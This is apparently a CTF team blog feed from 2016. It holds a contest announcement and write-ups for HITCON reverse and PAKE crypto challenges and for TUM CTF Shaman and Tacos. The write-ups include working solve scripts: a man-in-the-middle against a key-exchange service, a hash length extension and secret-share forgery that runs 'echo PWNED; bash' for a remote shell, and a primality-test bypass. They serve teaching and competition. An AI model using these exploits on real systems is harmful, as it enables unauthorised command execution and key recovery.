vos — Sat, 15 Oct 2016 17:16:09 +0000

Remember hack you CTF? Yeah, that random event that we throw for our freshmen and everyone interested. We’re hosting a new one.

It’s fall already and that means the new CTF season is starting, and so is the new academic year in the universities.

This is the time when we want to attract more freshmen into our CTF tarpit. Specifically, to our SPbCTF meetups in our city.
So we are running — a CTF.

But it’s not just for the freshmen. Wouldn’t it be fun to allow the whole world to beat the shit out of our first-year students, right? So we are opening hack you spb to everyone interested, just separating the scoreboards: one for the world and other just for confirmed SPbCTF fresh blood (bonus: if you manage to soceng our padawans for a verification string, you can compete in that special chart too).

Registration open: October 15th, 2016 — October 21st, 2016
Game starts: October 17th, 2016 15:00 UTC
Game ends: October 21st, 2016 15:00 UTC

Sign up: http://hackyou.ctf.su/

Don’t expect it to be challenging, it will be more of a speed-hack contest.

So in just a few words: New hack you. School-level tasks. October 17th.

HITCON CTF QUALS 2016 – Reverse (Reverse + PPC 500)

hellman — Tue, 11 Oct 2016 18:13:16 +0000

At least our ETA is better than M$.
http://xkcd.com/612/

reverse.bin

Summary: optimizing an algorithm using Treap data structure and CRC32 properties.

After reverse-engineering the binary, we can write the following pseudocode in python:

from binascii import crc32

def lcg_step():
    global lcg
    lcg = (0x5851F42D4C957F2D * lcg + 0x14057B7EF767814F) % 2**64
    return lcg

def extract(val):
    res = 32 + val - 95 * ((
        ((val - (0x58ED2308158ED231 * val >> 64)) >> 1) +
        (0x58ED2308158ED231 * val >> 64)) >> 6)
    return chr(res & 0xff)

buf = []
lcg = 8323979853562951413

crc = 0
for i in xrange(31415926):
    # append a symbol
    c = extract( lcg_step() )
    buf.append(c)

    # reverse interval
    x = lcg_step() % len(buf)
    y = lcg_step() % len(buf)
    l, r = min(x, y), max(x, y)
    buf[l:r+1] = buf[l:r+1][::-1]

    # update crc
    crc = crc32("".join(buf), crc) % 2**32

array = [...] # from binary
flag = ""
for i in range(len(array)):
    if buf[array[i]] == "}":
        flag += "%08x" % crc
    flag += buf[array[i]]

The binary generates a large array using an LCG PRNG, reverses subarrays defined by PRNG and updates the CRC of the whole state after each iteration. There are 31 million iterations total, and straightforward reversing subarrays and computing CRC32 will take quadratic time so this is going to be infeasible. We have to come up with better algorithm.

One of the data structures which can quickly reverse intervals is the Treap which is also known as randomized binary search tree. Since it is basically a binary search tree, it can easily be modified to maintain and update various sums on intervals. Since CRC32 is not a simple sum, it requires some special care. I took the basic implementation of Treap from here (the code in the end of the article).

A good thing about Treap is that it allows to quickly “extract” a node which corresponds to any interval of the array. In conjunction with lazy propagation, it allows to do cool things. For example, to reverse an interval we “extract” the node corresponding to that interval and set a “rev” flag. If then later we visit this node for some reason, the reversal is “pushed down”: two children of the node are swapped and each children’s “rev” flag is flipped. In such lazy way we will do logarithmic number of operations per each reversal on average.

The main problem here is to update the CRC32 state with the whole array after each reversal. We need to teach our Treap to compute CRC32 even after performing reversals.

Note that the CRC32 value is added to the flag only in the end, thus, using this basic Treap, we can already compute the final string and extract the first part of the flag in a few minutes:

hitcon{super fast reversing and CRC32 – [FINAL CRC HERE]}

Unfortunately, we HAVE to compute the CRC to get the points. Let’s do it!

About CRC32

The CRC32 without the initial and the final xors with 0xffffffff (let’s call it $rawCRC32$) is simply multiplication modulo an irreducible polynomial over $GF(2)$:

$$rawCRC32(m) = m \times x^{32} \mod P(x),$$

where

$$\begin{split}
P(X) & = & X^{32}+X^{26}+X^{23}+X^{22}+X^{16}+X^{12}+X^{11}+ \\
& + & X^{10}+X^8+X^7+X^5+X^4+X^2+X+1.
\end{split}$$

Such polynomials are nicely stored in 32-bit words. For example, $P(x) = \mathtt{0xEDB88320}$ (MSB are lowest degree terms). Multiplications are done in a way similar to fast exponentiation (see Finite field arithmetic).

A good thing is that $rawCRC32(m)$ is linear:

$$rawCRC32(a \oplus b) = rawCRC32(a) \oplus rawCRC32(b).$$

Shifting the message left by one bit is equivalent to multiplying it by $x$. Therefore, for concatenation we get:

$$rawCRC32(a || b) = rawCRC32(a) \times x^{|b|} \oplus rawCRC32(b).$$

Using this formula allows us to combine CRC values of two large strings quite quickly. Computing $x^{|y|}$ can be done using fast exponentiation or simply precomputed.

Adding CRC32 into the Treap

Let’s store in each tree node the $rawCRC32$ of the corresponding segment and, additionally, $rawCRC32$ of the reversed segment. Then, depending on the “rev” flag we may retrieve one or the other value. When we “push” the lazy reversal down, we simply swap the two values. The main part is then in computing the two $rawCRC$ values of a node using values of its child nodes. This is quite easy to code using the concatenation formula given before. The formula is also useful when merging the CRCs of the consequtive states.

Here is the CRC-related code:

uint32_t POLY = 0xedb88320L;
uint32_t HI = 1u << 31;
uint32_t LO = 1;
uint32_t ONEBYTE = (1u << 31) >> 8;

uint32_t BYTE_CRC[256];
uint32_t SHIFT_BYTES[100 * 1000 * 1000];

inline uint32_t poly_mul(uint32_t a, uint32_t b) {
    uint32_t p = 0;
    while (b) {
        if (b & HI) p ^= a;
        b <<= 1;
        if (a & LO) a = (a >> 1) ^ POLY;
        else a >>= 1;
    }
    return p;
}

void precompute() {
    SHIFT_BYTES[0] = HI; // 1
    FOR(i, 1, 100 * 1000 * 1000) {
        SHIFT_BYTES[i] = poly_mul(SHIFT_BYTES[i-1], ONEBYTE);
    }
    FORN(c, 256) {
        BYTE_CRC[c] = poly_mul(c, ONEBYTE);
    }
}

inline uint32_t lift(uint32_t crc, LL num) {
    return poly_mul(crc, SHIFT_BYTES[num]);
}

And here is modification of the Treap related to the CRC:

inline uint32_t crc1(pitem it) {
    if (!it) return 0;
    if (it->rev) return it->crc_backward;
    return it->crc_forward;
}
inline uint32_t crc2(pitem it) {
    if (!it) return 0;
    if (it->rev) return it->crc_forward;
    return it->crc_backward;
}

inline void update_up (pitem it) {
    if (it) {
        it->cnt = cnt(it->l) + cnt(it->r) + 1;

        int left_size = cnt(it->l);
        int right_size = cnt(it->r);
        uint32_t cl, cr, cmid;
        cmid = BYTE_CRC[it->value];

        cl = crc1(it->l);
        cr = crc1(it->r);
        it->crc_forward = lift(cl, right_size + 1) ^ lift(cmid, right_size) ^ cr;

        cl = crc2(it->l);
        cr = crc2(it->r);
        it->crc_backward = cl ^ lift(cmid, left_size) ^ lift(cr, left_size + 1);
    }
}

inline void push (pitem it) {
    if (it && it->rev) {
        swap(it->crc_forward, it->crc_backward);
        it->rev = false;
        swap (it->l, it->r);
        if (it->l)  it->l->rev ^= true;
        if (it->r)  it->r->rev ^= true;
    }
}

The full solution is available here.

This code works for ~40 minutes on my laptop and produces the final CRC: d72a4529.

The flag then is hitcon{super fast reversing and CRC32 – d72a4529}.

HITCON CTF QUALS 2016 – PAKE / PAKE++ (Crypto 250 + 150)

hellman — Mon, 10 Oct 2016 17:06:59 +0000

pake1.rb
pake2.rb

Summary: attacking password-based key exchange schemes based on SPEKE with MITM.

In these two challenges we were given a service which simply sends a flag after a session of some Password Authenticated Key Exchange (PAKE) scheme.

PAKE (The first challenge)

  fail unless is_safe_prime(p)

  # each password is an integer in 1..16
  passwords = IO.readlines('passwords').map(&:to_i)
  fail unless passwords.grep_v(1..16).empty?
  fail unless passwords.size == 11
  passwords.map!{|pass| Digest::SHA512.hexdigest(pass.to_s).to_i(16)}

  key = 0
  puts "p = #{p}"
  passwords.each.with_index(1) do |password, i|
    puts "Round #{i}"

    w = pow(password, 2, p)  # NO to Legendre
    b = 2 + SecureRandom.random_number(p - 2)
    bb = pow(w, b, p)
    puts "Server send #{bb}"

    aa = gets.to_i
    if aa < 514 || aa >= p - 514
      puts 'CHEATER!'
      exit
    end

    k = pow(aa, b, p)
    key ^= Digest::SHA512.hexdigest(k.to_s).to_i(16)
  end

  flag ^= key
  puts "Flag is (of course after encryption :D): #{flag}"

The server has 11 very small password – integers from 1 to 16. For each password a simple Diffie-Hellman key exchange is done, however the generator depends on the password (this is SPEKE protocol). Then all the resulting keys for all passwords are xored.

Clearly, we can’t guess all the keys at once. On the other hand, if we don’t guess even a single key, the final key is xored with something “random” to us, something about what we don’t have any information at all. From this point of view this challenge looks unsolvable and I was stuck on it for the whole day. The challenge author even increased the points from 150 to 250 since nobody solved it for some time.

The key idea is that we can do a Man-In-The-Middle attack here, between the server and… the server itself! Indeed, the server is the only “person” who knows the passwords and can pass the protocol in a meaningful way. We can maintain two connections and for each password $p$ we will exchange the $g_p^a$ and $g_p^b$ send to us by the server in two connections. Then they will obtain same secret for each of the passwords: $g_p^{ab}$ and the same final master key too!

It is cool that we managed to connect the server to itself, but.. the flag is still encrypted… However, now we can perform attacks on single passwords! Indeed, if we guess a password $p$ correctly, then we can compute the generator $g_p$ and perform the basic MITM attack against classical Diffie-Hellman. For example, we allow the servers to exchange keys related to the first 10 passwords, and then for the 11-th password $p$ we try to guess it and send $g_p^1$ to both servers. Then the servers will compute 11th shared keys $g_p^{a}$ and $g_p^{b}$ which they have already sent to us. Now, the final xor of the keys will be different on two servers. However, if our password guess was correct, we can unxor the last shared keys and see that the new shared keys are now equal. Thus we have obtained a way to bruteforce each password separately.

Here is solution script (takes a while due to heavy PoW):

import os
from hashlib import sha512, sha1

from libnum import *
from sock import Sock

def getHashes(p1, p2):
    # bruteforce proof-of-work in C
    data = os.popen("./sha1 '%s' '%s'" % (p1, p2)).read()
    return data.split()

def numhash(n):
    return s2n(sha512(str(n)).digest())

p = 285370232948523998980902649176998223002378361587332218493775786752826166161423082436982297888443231240619463576886971476889906175870272573060319231258784649665194518832695848032181036303102119334432612172767710672560390596241136280678425624046988433310588364872005613290545811367950034187020564546262381876467
pws = [8, 15, 9, 15, 7, 7, 13, None, 10, 15, None]
pws = [None] * 11
for pwi in xrange(11):
    if pws[pwi] is not None:
        continue
    for pwc in xrange(1, 17):
        print pwi, pwc, "getting prefixes"
        f1 = Sock("52.197.112.79 20431")
        f2 = Sock("52.197.112.79 20431")
        prefix1 = f1.read_until_re(r"prefix: (\S+)").decode("base64")
        prefix2 = f2.read_until_re(r"prefix: (\S+)").decode("base64")

        sol1 = sol2 = getHashes(prefix1, prefix2)
        f1.send_line(str(sol1.encode("base64").strip()))
        f2.send_line(str(sol2.encode("base64").strip()))

        recnum1 = None
        recnum2 = None
        for i in xrange(11):
            num1 = int(f1.read_until_re(r"Server send (\d+)"))
            num2 = int(f2.read_until_re(r"Server send (\d+)"))
            if i != pwi:
                f1.send_line(str(num2))
                f2.send_line(str(num1))
            else:
                gp = pow(numhash(pwc), 2, p)
                f1.send_line(str(gp))
                f2.send_line(str(gp))
                recnum1 = numhash(num1)
                recnum2 = numhash(num2)

        f1.read_until("Flag is")
        f2.read_until("Flag is")

        res1 = int(f1.read_until_re(r": (\w+)"))
        res2 = int(f2.read_until_re(r": (\w+)"))
        if res1 ^ recnum1 == res2 ^ recnum2:
            print "MATCH!", "pw[%d] = %d" % (pwi, pwc)
            pws[pwi] = pwc
            print pws
            break

After we have obtained the all passwords, we can implement the legitimate session and get the flag: hitcon{73n_w34k_p455w0rd5_c0mb1n3d_4r3_571ll_wE4k_QQ}

Pake++ (The second challenge)

In the second challenge, the scheme was slightly altered. There are now 8 different prime moduli, each time the prime to be used is chosen at random. Also there is only one password and it has very high entropy. Finally, we have two rounds at each time. Each round a different prime is chosen, but the password is always the same.

  primes = <<-EOS.lines.map(&:to_i)
  285370232948523998980902649176998223002378361587332218493775786752826166161423082436982297888443231240619463576886971476889906175870272573060319231258784649665194518832695848032181036303102119334432612172767710672560390596241136280678425624046988433310588364872005613290545811367950034187020564546262381876467
  298619967637074381179969535203891334279037109216429406440598651658759350405543564192161651312771530156893413427058175045425757160212464963471306913768112396967665485652095651332292521663596653434043497333804676303590560939622585332770724390627970615864007468306226942254398801398715678948641382895998651226267
  298049748677563805780319663628819960854615659462424022507630185085633596966175010904970480952385372951172828141165347514534458425242085310886903778569556019799929063608007455863031014344586675081359600240391009588905845818495639778564642452193502269859322492791462878008970754999615280381704729202349939626979
  328517416048692886037451935540065593512994462002198409216093662374867257380362145180594029938263095492728312598227855130627235361314817436633177786884494030007864152308901161140111969980403722704138376439893801083486571959976238463025246682645769458504940248785078868650651872930977987712522710703736396657387
  282394389781374199382509925858094901774563649174745796339967395605116291562054020073955455338401167970080036287402587308354538500190221028476399923564634339732689941702464496890308354549764266506953808881910012117986860385319905877301417806557760524821229657147194856430018136428864202922733288830153277890659
  323103830544117987011024048071694067643223166857443601288678625077550042396643402625692490043863582981782378717042298512462563264457088124223575174164921578128007273839310675925364961100802146846497562297376569657569712628347758371790366124768858903423043207000026049079160253301902404207920358137230602539643
  302103350544659483531131684583742544907887033086695553935842864801685693649953339273310786890360791425112212069129996061391578244584149171226282625727635376367322205108426287980490462476857893899354488802419996817239780781622440165425711955277936322570946121224712118336303389972089563531346006960196427704219
  274405967560432033789798999119890457360306712028734789799802515309420810630484361406114488871989143593759704555407742610118391422809479638606936598462341976320928990585877751200977318034499800109548890002507225944134922612505410751207789339655283747859299017222586400523098060723763539689025418276604564593619
  EOS
  fail unless primes.all?{|p| is_safe_prime(p)}

  password = IO.read('password2').strip
  fail unless password =~ /\A[a-zA-Z0-9]{20}\z/
  password = Digest::SHA512.hexdigest(password).to_i(16)

  key = 0
  2.times do |i|
    puts "Round #{i + 1}"

    p = primes[SecureRandom.random_number(primes.size)]
    puts "p = #{p}"

    w = pow(password, 2, p)  # NO to Legendre
    b = 2 + SecureRandom.random_number(p - 2)
    bb = pow(w, b, p)
    puts "Server send #{bb}"

    aa = gets.to_i
    if aa < 514 || aa >= p - 514
      puts 'CHEATER!'
      exit
    end

    k = pow(aa, b, p)
    key ^= Digest::SHA512.hexdigest(k.to_s).to_i(16)
  end

  flag ^= key
  puts "Flag is (of course after encryption :D): #{flag}"

Now that we know the MITM idea, it is not much harder. If we manage to get the the same primes in two connections and simply exchange the values sent, we will get same key in both connections. Even if the keys are different, we can’t get the flag from having $flag \oplus stuff1$ and $flag \oplus stuff2$. For example, if we xor these two things together, the flag is cancelled. To avoid this we simply add the third connection! Then triple xor of $flag \oplus stuff$ will still have $flag$ and hopefully we can cancel all the stuff.

Indeed, we can try to make the following key exchanges between connections $a, b, c$:

$$\begin{split}
k_1 = key\_exchange(a, b), \\
k_2 = key\_exchange(a, c), \\
k_3 = key\_exchange(b, c).
\end{split}$$

Then we will get:

$$\begin{split}
flag \oplus k_1 \oplus k_2 ~\mbox{from}~ a, \\
flag \oplus k_1 \oplus k_3 ~\mbox{from}~ b, \\
flag \oplus k_2 \oplus k_3 ~\mbox{from}~ c.
\end{split}$$

Xoring everythin results in the flag!

There are some technicalities. We need to distribute these three exchanges between all 2 rounds in all 3 connections. This is easy, since the servers not necessarily need to exchange in the same round.

A slightly harder problem is to wait until the primes match in a right way. We can do the following:

Open several connections until there is a pair of connections with the same prime $p_{ab}$ in the first round.
Perform the exchange between them.
See the second round primes $p_a$ and $p_b$.
Find a client in the pool or make new connections until we get a connection with the first round prime equal to either $p_a$ or $p_b$.
Perform the exchange between the corresponding connections.
Now we have no choice and only one exchange left to do. If the primes do not match, we repeat the full algorithm.
Otherwise, we get the flag.

The flag: hitcon{m17m_f0r_pr0f1t_bu7_S71ll_d035n7_kn0w_p455w0rd}

TUM CTF 2016 – Shaman (Crypto 500)

hellman — Mon, 03 Oct 2016 20:02:07 +0000

Oh great shaman!

Somehow the village idiot got his hands on this fancy control machine controlling things. Obviously, we also want to control things (who wouldn’t?), so we reverse-engineered the code. Unfortunately, the machine is cryptographically protected against misuse.

Could you please maybe spend a few seconds of your inestimably valuable time to break that utterly simple cryptosystem and enlighten us foolish mortals with your infinite wisdom?

nc 104.155.168.28 31031

vuln.py

NOTE: Since I am really bad at math, the share received from the server won’t be accepted when sent back. Don’t get confused by this — the challenge is solvable nevertheless.

Summary: hash length extension, manipulation of secret shares.

The challenge server consists of a mix of secret sharing, authentication and command execution. Briefly, it works as follows:

The server generates a command of the form
cmd = checksum + "echo Hello!#" + [32 random bytes],
and interprets it as an integer modulo 256-bit prime $p$.
The server splits the command into 3 shares with threshold equal to 2, meaning that knowing any 2 of the 3 shares is enough to recover the secret. Shamir’s secret sharing is used (using polynomials over $\mathbb{F}_p$).
One of the shares is signed by prepending a MAC:
signed_share = SHA256(key + share) + share.
The signed share is sent to the client.
Now the server listens to queries from the client, the number is limited by 0x123.

In each query, the client cant send a signed share.
The server combines it with another share.
The server checks the checksum and if it is good, executes the command.

Modifying the share

First observation: if the MAC is good enough, we can’t generate any other signed share and therefore we can’t execute any command other than “echo Hello”. Therefore we have to attack the MAC. Luckily, it is vulnerable to the well known Hash Length Extension attack. There is a very convenient tool called hash_extender for performing the attack.

The attack allows us, given a hash of the form SHA256(key + share), to append some uncontrolled padding and, additionally, arbitrary amount of data to the hash input. This appending is done in such a way that we can compute the new hash value without knowing the key. That is, we can generate more signed shares of the form share + [padding] + [any data].

What does it give to us? The share has the following format: (32-byte $x$, 32-byte $y$) and the values are packed in the Little Endian order (least significant bytes first). When the values are unpacked, everything after $y$ will be considered as a part of $y$. Even if it’s more than 32 bytes, it will be taken modulo $p$. That is, we can modify the share’s $y$ by adding $(2^{256} \times padding + 2^{256+e} \times value)$ to it, where $e$ is determined by padding. Since it is reduced modulo $p$ afterwards, we can actually obtain arbitrary $y_{wanted}$. Indeed, setting $$value \equiv (y_{wanted} – y_{orig} – 2^{256} \times padding) / 2^{256+e} \pmod {p}$$ will do the job.

Here’s python code for modifying the signed share’s $y$ component to arbitrary value:

# hash_extender is a wrapper around the command line hash_extender
# trick: first we append nothing to obtain the base value
testdata, _sig = hash_extender(
    data=share,
    hash=sig,
    append="",
    hashname="sha256",
    length=keylen
)
# y = 2^e * c + sometrash (mod p)
# c = (y - sometrash) / 2^e (mod p)
e = len(testdata) * 8
inv2e = invmod(2**e, p)
trash = from_bytes(testdata) % p

def gen_share_with_y(y):
    c = (y - trash) * inv2e % p
    newdata, newsig = hash_extender(data=share, hash=sig, append=to_bytes(c), hashname="sha256", length=keylen)
    return newsig + newdata.encode("hex")

Digging into the secret sharing

Our final goal is to execute some evil command on the server. The command is obtained from combining the two shares: our share and one of the server’s shares. We can partially modify our share, but the server’s share stays untouched! Is it still possible to modify the command in a meaningful way? Hoping for lucky random commands (like “sh\n”) is a bad idea, since the command is prepended by a SHA256 checksum…

Let’s look closer at the sharing scheme. When splitting the shares, the server creates a random polynomial of degree 1 (it has (threshold) coefficients) with the constant coefficient equal to the secret being shared. Then it is evaluated on three random points, and the three $(x_i, y_i)$ pairs are the shares. For a polynomial of degree 1, any two different points are enough to recover the full polynomial, that’s how it works! The interpolation algorithm is implemented on the server and we actually don’t care about the implementation, we care only about semantics of it.

We can think about the combining step as follows: the server has two shares $(x_1, y_1)$ and $(x_2, y_2)$ and it wants to find two coefficients $a, b$ in the finite field $\mathbb{F}_p$ for which the equation $a*x + b = y$ holds for both shares. That is, it solves the following linear system with two unknowns $a, b$:

$$\begin{cases}
a x_1 + b = y_1,\\
a x_2 + b = y_2,\\
\end{cases}$$

Then $b$ is the constant coefficient in the polynomial and so is the initial secret.

Let’s say our share is number 2, so we control $y_2$. Let’s solve the system for $b$:

$$\begin{split}
a & = & \frac{y_1 – y_2}{x_1 – x_2}, \\
b & = & y_2 – a x_2 = y_2 – x_2\frac{y_1 – y_2}{x_1 – x_2} = y_2 – u + y_2 / v = w y_2 – u.
\end{split}$$

Note that we have done some variable replacements, since we don’t really care about all values $(x_1, y_1, x_2)$, but only about the minimum number of expressions involving them. We obtained that the algorithm the server uses to combine the shares is basically a linear function of $y_2$, which we control! So we have only two unknowns, the coefficients $w$ and $u$! How can we learn them? Obviously we need to get some information from the server, since we know nothing about the share #1.

Recovering the linear coefficients

For simplicity, let’s rename variables and assume that the server computes $secret \equiv a y_2 + b \pmod{p}$ ($a$ and $b$ are the new unknowns, unrelated to previous ones).
Since we have no information about $a, b$ we can’t set $secret$ in a meaningful way first. Therefore the checksum check will fail… and the server will leak a part of the $secret$ that he combined!

def unpack(msg, key = b''):
    tag = msg[:SHA.digest_size]
    if tag == SHA.new(key + msg[len(tag):]).digest():
        return msg[len(tag):]
    print('bad {}: {}'.format(('checksum', 'tag')[bool(key)], tohex(tag)))

Unluckily, the server leaks only 256 least significant bits of the secret (from 512). To sum up, we have the following oracle:

(Share with $y_2$) $\mapsto$ (256 LSBs of the resulting secret).

First, we can query $y_2 = 0$ and obtain the LSBs of $secret = (0y_2 + b) \mod{p} = b$. Then we can query $y_2 = 1$ and obtain LSBs of $(a + b) \mod{p}$, which quite often will be equal to just LSBs of $a + b$, therefore we can learn also LSBs of $a$. So, we can learn 256 LSBs of $a$ and $b$ in 2 queries.

Now, let’s try to shift $a$ down so that we learn the MSBs of it. To do this we set $y_2$ to $2^{-256} \pmod{p}$. However this is not exactly the shift due to modulo $p$. What we obtain is:

$$(y_2 a + b) \mod{p} = (2^{-256} a + b) \mod {p} = ((a + kp) / 2^{256} + b) \mod {p},$$

where $k$ is such that $a + kp \equiv 0 \pmod{2^{256}}$ and the last division is done in integers. Luckily, we know LSBs of $a$, that is, we know $a \mod{2^{256}}$, we can predict LSBs of $k$:

$$k \equiv -a/p \pmod{2^{256}}.$$

Now comes an interesting point. The smallest such $k = k_0$ is less than $2^{256}$. All other $k$ satisfying this condition can be described as $k = k_0 + t2^{256}$ for some integer $t$. Note that:

$$\begin{split}
((a + kp) / 2^{256} + b) \mod{p} & = & ((a + k_0p + 2^{256}tp) / 2^{256} + b) \mod{p}\\
& = & ((a + k_0p) / 2^{256} + b + tp) \mod{p},
\end{split}$$

…and $tp$ goes away due to modulo! This means that we need to know only $k \equiv -a/p \mod{2^{256}}$, which we can compute as mentioned before.

Moreover, we can guess whether the last addition of $b$ overflowed the modulo or not. Let’s assume that it did not, it is quite probable. Then for the query $y_2 = (2^{-256} \mod{p})$ we get (note the modulo change):

$$r = (2^{-256}a + b) \mod{p} \equiv (a + kp) / 2^{256} + b \pmod{2^{256}}.$$

Then using known LSBs of $b$ we get:

$$2^{256} (r – b) \equiv a + kp \pmod {2^{512}}.$$

$$a \equiv 2^{256} (r – b) – kp \pmod {2^{512}}.$$

We learned the full $a$! Recall that we assumed that addition of $b$ does not overflow the modulo. We can guess this and try to add $p$, or choose first $y_0=2^{128}$ instead of $y_0=2^{256}$ and learn full $a$ in two steps. This trick allows us to notice the additional subtraction of $p$ since in the first query half of the obtained bits should match the known bits of $a$.

Ok, how to learn full $b$ now? Sadly, we can’t shift it and the effect of it’s high bits is quite limited. We now can exploit the effect of $b$ on overflowing the modulo: for specially crafted queries we will check how many times we overflow the modulo and deduce some information about $b$. Recall that we can query

$$(ay_0 + b) \mod {p} = ay_0 + b -kp$$

for some $k$. Note that since $b < p$, its value may change $k$ only by $1$. Let's perform a binary search of the real value of $b$. Assume that we know that $b_l \le b \le b_r$ for some known $b_l, b_r$. Let $mid = (b_l + b_r) / 2$. Then we can craft such $y_0$ that for fall $b_l \le b < mid$ we will get known $k = k_0$ and for $mid \le b \le b_r$ we will get $k = k_0 - 1$. Such $y_0$ can be obtained as $y_0 \equiv -mid / a \pmod{p}$, since then $$(y_0 a + b) \mod{p} = (b - mid) \mod{p}$$ and then we will get either $b - mid$ or $b - mid + p$. Since we know LSBs of $b$ and $mid$, we can easily distinguish between two cases and divide the search space for $b$ by 2. Note that we need to learn only 256 MSBs of $b$, so we are good with around 256 queries for this binary search.

To sum up, we need 2 queries to learn LSBs of $a$ and $b$, 2 queries to learn full $a$ and at most 256 queries to learn full $b$.

Here’s python code for recovering $a, b$:

def oracle(y):
    assert 'what have you got' in f.read_line()
    f.send_line(gen_share_with_y(y))
    res = f.read_line()
    assert "bad checksum" in res, "oracle failed: %r" % res
    return from_bytes(res.split()[-1].decode("hex"))

MOD = 2**256
blow = oracle(0) % MOD
alow = (oracle(1) - blow) % MOD
i2 = invmod(2, p)
a = alow
for e in (128, 256):
    mod2 = 2**e
    k = invmod(p, mod2) * (-a) % mod2
    assert (a + k * p) % mod2 == 0

    res = (oracle(i2**e) - blow) % MOD
    shifted = ((res << e) - k * p) % (MOD << e)
    # did we get additional -p because of b?
    if shifted % MOD != a % MOD:
        res = (oracle(i2**e) - blow + p) % MOD
        shifted = ((res << e) - k * p) % (MOD << e)
        assert shifted % MOD == a % MOD
    a |= shifted

print "Learned full   a:", tohex(a)
if a >= p:
    assert 0, "Failed, seems in the second query there was an overflow."

ia = invmod(a, p)
bl = 0
br = p - a - 1
while bl < br:
    mid = (bl + br) // 2
    x = ia * (-mid) % p
    assert (x*a + mid) % p == 0
    res = oracle(x) % MOD
    if res == (blow - mid) % MOD:
        bl = mid
    elif res == (blow - mid + p) % MOD:
        br = mid - 1
    else:
        assert 0, "Failed, seems in the second query there was an overflow."
    if bl >> 256 == br >> 256:
        break

b = br - br % MOD + blow
print "Learned full   b:", tohex(b)

if b >= p:
    assert 0, "Failed, seems in the second query there was an overflow."

Forging the Evil Command

Finally, when we have learned $a$ and $b$, we can forge and execute arbitrary commands:

def pack(msg, key=''):
    return SHA.new(key + msg).digest() + msg

packed = from_bytes(pack(r"echo PWNED; bash"))
assert packed < p
y = (packed - b) * ia % p
assert (a * y + b) % p == packed

print "Command executing:"
assert 'what have you got' in f.read_line()
f.send_line(gen_share_with_y(y))
f.interact()

In half of the runs we will get a shell!

TUM CTF 2016 – Tacos (Crypto 400)

hellman — Sun, 02 Oct 2016 17:50:57 +0000

All my fine arts and philosophy student friends claim discrete logarithms are hard. Prove them wrong.

nc 104.198.63.175 1729

vuln_tacos.py

Summary: bypassing Fermat primality test with Carmichael numbers and solving discrete logarithm using Pohlig-Hellman algorithm.

The source code is quite simple:

def is_prime(n):
    for _ in range(42):
        if pow(random.randrange(1, n), n - 1, n) != 1:
            return False
    return True

q, p = int(input(), 0), int(input(), 0)

assert 2 ** 1024 < p < q < 2 ** 4096
assert is_prime(q)
assert not (q - 1) % p
assert is_prime(p)

g = random.randrange(1, q)
y = pow(g, random.randrange(q - 1), q)
print(hex(g), hex(y))
signal.alarm(60)

# good luck!
if pow(g, int(input(), 0), q) == y:
    print(open('flag.txt').read().strip())

We need to supply a large prime modulo $q$ with large multiplicative subgroup of order $p$. And then the server will ask us to perform a discrete logarithm in this group. There are no known algorithms for such setting. However, here we can bypass some conditions - the primality test. is_prime uses Fermat test to check for primality. It is well known that Carmichael numbers bypass such test easily. Note that Carmichael numbers do not bypass Fermat test in 100% of cases! They bypass if only when witness (base) is coprime with $p$, otherwise the base yields a divisor of $p$. Nonetheless, for non-Carmichael and non-prime numbers Fermat test declines composite numbers with much higher probability, therefore Carmichael numbers are our only hope here.

Bypassing primality test

Assume that we can generate Carmichael numbers of ~3000 bits with lots of small prime factors. There are two paths here:

Generate Carmichael $q$ (false prime) until we can find a large real prime factor $p$ of $q-1$. In such case we will be able to do discrete log modulo each prime factor of $q$ and then combine them using CRT.
Generate Carmichael $p$ (false prime) until we can find a large real prime $q$ for which $p | (q - 1)$. In this case we will have to do discrete log modulo large prime $q$, but separately for each of the small subgroups (obtained from factorization of $p$).

For both ways we would need Pohlig-Hellman method, but in the second case the arithmetic will be much heavier (since all small logs must be done modulo large $q$). Also it is easier to find small prime $p$ than large prime $q$. Therefore, the first way is preferrable.

The way we will find $p$ is simple: first we obtain some Carmichael number $q$, then we remove small factors from $q$ by let's say trial division. Then we check if the result is prime. It should happen quite often!

Now the problem is - how to generate Carmichael numbers? One of the basic algorithms is Erdos algorithm, described for example in this paper:

Here is my implementation of its simplest randomized version in Sage:

from sage.all import *
import operator

first_primes = list(primes(10**7))

# it is important to find good lambda
# the algorithm highly depends on it
# this one is from some paper
factors = [2**5, 3**2, 5, 7, 11, 13, 17]
lam = reduce(operator.mul, factors)
# lam = /\ = 24504480

P = []
for p in primes(min(10000000, lam)):
    # do not include large primes so that Fermat test
    # has higher probability to pass
    if p < 400:
        continue
    if lam % p and lam % (p - 1) == 0:
        P.append(p)

print "P size", len(P)

prodlam = reduce(lambda a, b: a * b % lam, P)
prod = reduce(lambda a, b: a * b, P)

# faster prime checks
proof.arithmetic(False)

while 1:
    numlam = 1
    num = 1
    # we are building random subset {p1,...,p20}
    # and checking the subset at each step
    for i in xrange(20):
        p = choice(P)
        numlam = numlam * p % lam
        num = num * p
        if numlam != prodlam or prod % num != 0:
            continue
        q = prod // num
        print "candidate", q
        print factor(q)
        print
        ps = [p for p, e in factor(q)]
        is_carm = ( (q - 1) % lcm([p-1 for p in ps]) == 0 )
        if not is_carm:
            continue

        # now check if q - 1 = small primes * large prime p
        # since we need to know such p
        # should happen by chance quite often
        t = q - 1
        for p in first_primes:
            while t % p == 0:
                t //= p
        if is_prime(t):
            print "Good!"
            print "q =", q, "#", len(q.bits()), "bits"
            print "p =", p, "#", len(p.bits()), "bits"
            print
            open("candidates", "a").write("q = %d\n" % q)
            open("candidates", "a").write("p = %d\n\n" % p)

# solution:
q = 59857999685097510058704903303340275550835640940514904342609260821117098340506319476802302889863926430165796687108736694628663794024203081690831548926936527743286188479060985861546093711311571900661759884274719541236402441770905441176260283697893506556009435089259190308034118717196693029323272007089714272903225216389846915864612112381878100108428287917605430965442572234711074146363466926780699151173555904751392997928289187479977403795442182731620805949932616667193358004913424246140299423521
p = 62524500763431441748481642690708441489776386892126187254070724779722504054292898512943722029745633023670685560530873804922086432332770562190282869379418979194485569141426416326281184435782910942683630763055432514713734358605440032411156894024431274583468338817956399407807741136790938228633811230955007519469063632837378284757301519562677312080310137628454021752642170957113443979650111115572728879157653822412120689975685302219422272533094042684647476957834486986793341

It takes around 30-60 minutes to find a solution, for example:

